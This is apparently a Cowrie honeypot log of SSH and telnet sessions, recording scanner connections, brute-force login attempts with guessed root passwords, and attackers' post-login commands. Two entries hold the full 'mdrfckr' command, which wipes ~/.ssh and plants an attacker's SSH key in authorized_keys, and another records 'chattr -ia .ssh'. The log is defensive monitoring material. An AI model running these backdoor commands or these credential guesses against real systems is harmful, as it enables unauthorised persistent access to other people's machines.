{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:33:00.455268Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:33:00.710738Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:33:00.711669Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46072,"dst_ip":"1.2.3.4","dst_port":22,"session":"811298190c72","protocol":"ssh","message":"New connection: 212.227.235.229:46072 (1.2.3.4:22) [session: 811298190c72]","sensor":"my-vps","timestamp":"2025-08-26T05:33:00.961984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:33:00.962722Z","src_ip":"212.227.235.229","session":"811298190c72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:33:01.214918Z","src_ip":"212.227.235.229","session":"811298190c72"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:33:02.266705Z","src_ip":"212.227.235.229","session":"811298190c72"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:33:03.521224Z","src_ip":"212.227.235.229","session":"811298190c72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46756,"dst_ip":"1.2.3.4","dst_port":22,"session":"35cdfb3b814f","protocol":"ssh","message":"New connection: 212.227.235.229:46756 (1.2.3.4:22) [session: 35cdfb3b814f]","sensor":"my-vps","timestamp":"2025-08-26T05:33:03.778556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:33:03.779879Z","src_ip":"212.227.235.229","session":"35cdfb3b814f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:33:04.039996Z","src_ip":"212.227.235.229","session":"35cdfb3b814f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:33:05.123446Z","src_ip":"212.227.235.229","session":"35cdfb3b814f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:33:05.386073Z","src_ip":"212.227.235.229","session":"35cdfb3b814f"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:33:05.387986Z","src_ip":"212.227.235.229","session":"8b38f227841f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34262,"dst_ip":"1.2.3.4","dst_port":23,"session":"8101c8e6ce7f","protocol":"telnet","message":"New connection: 212.227.235.229:34262 (1.2.3.4:23) [session: 8101c8e6ce7f]","sensor":"my-vps","timestamp":"2025-08-26T05:33:43.052343Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60407,"dst_ip":"1.2.3.4","dst_port":23,"session":"1291696605b5","protocol":"telnet","message":"New connection: 212.227.235.229:60407 (1.2.3.4:23) [session: 1291696605b5]","sensor":"my-vps","timestamp":"2025-08-26T05:35:14.811361Z"}
{"eventid":"cowrie.session.closed","duration":0.23088312149047852,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:35:15.042174Z","src_ip":"212.227.235.229","session":"1291696605b5"}
{"eventid":"cowrie.session.closed","duration":120.00410628318787,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:35:43.056381Z","src_ip":"212.227.235.229","session":"8101c8e6ce7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44184,"dst_ip":"1.2.3.4","dst_port":23,"session":"52d72ae5412b","protocol":"telnet","message":"New connection: 212.227.125.160:44184 (1.2.3.4:23) [session: 52d72ae5412b]","sensor":"my-vps","timestamp":"2025-08-26T05:36:06.038641Z"}
{"eventid":"cowrie.session.closed","duration":0.5196750164031982,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:36:06.558248Z","src_ip":"212.227.125.160","session":"52d72ae5412b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58676,"dst_ip":"1.2.3.4","dst_port":23,"session":"0bcf1d42f71c","protocol":"telnet","message":"New connection: 212.227.235.229:58676 (1.2.3.4:23) [session: 0bcf1d42f71c]","sensor":"my-vps","timestamp":"2025-08-26T05:38:46.442204Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e475cacb0296","protocol":"ssh","message":"New connection: 217.72.205.35:50120 (1.2.3.4:22) [session: e475cacb0296]","sensor":"my-vps","timestamp":"2025-08-26T05:38:47.271184Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:38:47.272240Z","src_ip":"217.72.205.35","session":"e475cacb0296"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52310,"dst_ip":"1.2.3.4","dst_port":23,"session":"1cc605fd20b8","protocol":"telnet","message":"New connection: 212.227.125.160:52310 (1.2.3.4:23) [session: 1cc605fd20b8]","sensor":"my-vps","timestamp":"2025-08-26T05:38:52.602761Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T05:38:54.465737Z","src_ip":"212.227.125.160","session":"1cc605fd20b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33015,"dst_ip":"1.2.3.4","dst_port":23,"session":"423058f70a1d","protocol":"telnet","message":"New connection: 212.227.235.229:33015 (1.2.3.4:23) [session: 423058f70a1d]","sensor":"my-vps","timestamp":"2025-08-26T05:38:56.612919Z"}
{"eventid":"cowrie.session.closed","duration":4.056143045425415,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:38:56.658808Z","src_ip":"212.227.125.160","session":"1cc605fd20b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37336,"dst_ip":"1.2.3.4","dst_port":23,"session":"aca7a50bf874","protocol":"telnet","message":"New connection: 212.227.125.160:37336 (1.2.3.4:23) [session: aca7a50bf874]","sensor":"my-vps","timestamp":"2025-08-26T05:38:56.696993Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:38:56.826226Z","src_ip":"212.227.125.160","session":"aca7a50bf874"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:38:56.884490Z","src_ip":"212.227.125.160","session":"aca7a50bf874"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T05:38:56.955567Z","src_ip":"212.227.125.160","session":"aca7a50bf874"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":44375,"dst_ip":"1.2.3.4","dst_port":23,"session":"70eda760da97","protocol":"telnet","message":"New connection: 123.31.39.100:44375 (1.2.3.4:23) [session: 70eda760da97]","sensor":"my-vps","timestamp":"2025-08-26T05:38:57.435172Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:38:57.976445Z","src_ip":"212.227.125.160","session":"aca7a50bf874"}
{"eventid":"cowrie.session.closed","duration":1.2876243591308594,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:38:57.984657Z","src_ip":"212.227.125.160","session":"aca7a50bf874"}
{"eventid":"cowrie.session.connect","src_ip":"78.39.251.103","src_port":59014,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e6b0a7b8b9f","protocol":"telnet","message":"New connection: 78.39.251.103:59014 (1.2.3.4:23) [session: 2e6b0a7b8b9f]","sensor":"my-vps","timestamp":"2025-08-26T05:39:01.203359Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":44877,"dst_ip":"1.2.3.4","dst_port":23,"session":"d454a0a72e94","protocol":"telnet","message":"New connection: 123.31.39.100:44877 (1.2.3.4:23) [session: d454a0a72e94]","sensor":"my-vps","timestamp":"2025-08-26T05:39:02.664664Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51527,"dst_ip":"1.2.3.4","dst_port":23,"session":"bdf6a0c576f7","protocol":"telnet","message":"New connection: 212.227.235.229:51527 (1.2.3.4:23) [session: bdf6a0c576f7]","sensor":"my-vps","timestamp":"2025-08-26T05:39:05.773514Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51616,"dst_ip":"1.2.3.4","dst_port":23,"session":"a303c4930483","protocol":"telnet","message":"New connection: 212.227.235.229:51616 (1.2.3.4:23) [session: a303c4930483]","sensor":"my-vps","timestamp":"2025-08-26T05:39:07.874540Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50758,"dst_ip":"1.2.3.4","dst_port":23,"session":"5326a2de75f8","protocol":"telnet","message":"New connection: 212.227.235.229:50758 (1.2.3.4:23) [session: 5326a2de75f8]","sensor":"my-vps","timestamp":"2025-08-26T05:39:07.969512Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35689,"dst_ip":"1.2.3.4","dst_port":23,"session":"0713d306f112","protocol":"telnet","message":"New connection: 212.227.125.160:35689 (1.2.3.4:23) [session: 0713d306f112]","sensor":"my-vps","timestamp":"2025-08-26T05:39:08.935427Z"}
{"eventid":"cowrie.session.closed","duration":13.071908473968506,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:14.275187Z","src_ip":"78.39.251.103","session":"2e6b0a7b8b9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36477,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa3ff998f163","protocol":"ssh","message":"New connection: 212.227.235.229:36477 (1.2.3.4:22) [session: fa3ff998f163]","sensor":"my-vps","timestamp":"2025-08-26T05:39:32.368403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:39:32.369930Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:39:32.566197Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.session.closed","duration":46.235185861587524,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:32.677293Z","src_ip":"212.227.235.229","session":"0bcf1d42f71c"}
{"eventid":"cowrie.login.success","username":"root","password":"cn123456","message":"login attempt [root/cn123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:39:33.419055Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:39:33.833211Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:39:33.834073Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:39:33.835471Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.034093Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:39:34.519106Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.519823Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.718893Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.719822Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36774,"dst_ip":"1.2.3.4","dst_port":22,"session":"97daa36cd8e9","protocol":"ssh","message":"New connection: 212.227.235.229:36774 (1.2.3.4:22) [session: 97daa36cd8e9]","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.914344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:39:34.915233Z","src_ip":"212.227.235.229","session":"97daa36cd8e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:39:35.111159Z","src_ip":"212.227.235.229","session":"97daa36cd8e9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:39:35.938783Z","src_ip":"212.227.235.229","session":"97daa36cd8e9"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:37.137614Z","src_ip":"212.227.235.229","session":"97daa36cd8e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37125,"dst_ip":"1.2.3.4","dst_port":22,"session":"32073ee44a1b","protocol":"ssh","message":"New connection: 212.227.235.229:37125 (1.2.3.4:22) [session: 32073ee44a1b]","sensor":"my-vps","timestamp":"2025-08-26T05:39:37.316229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:39:37.317162Z","src_ip":"212.227.235.229","session":"32073ee44a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:39:37.496161Z","src_ip":"212.227.235.229","session":"32073ee44a1b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:39:38.256128Z","src_ip":"212.227.235.229","session":"32073ee44a1b"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:39:38.436315Z","src_ip":"212.227.235.229","session":"fa3ff998f163"}
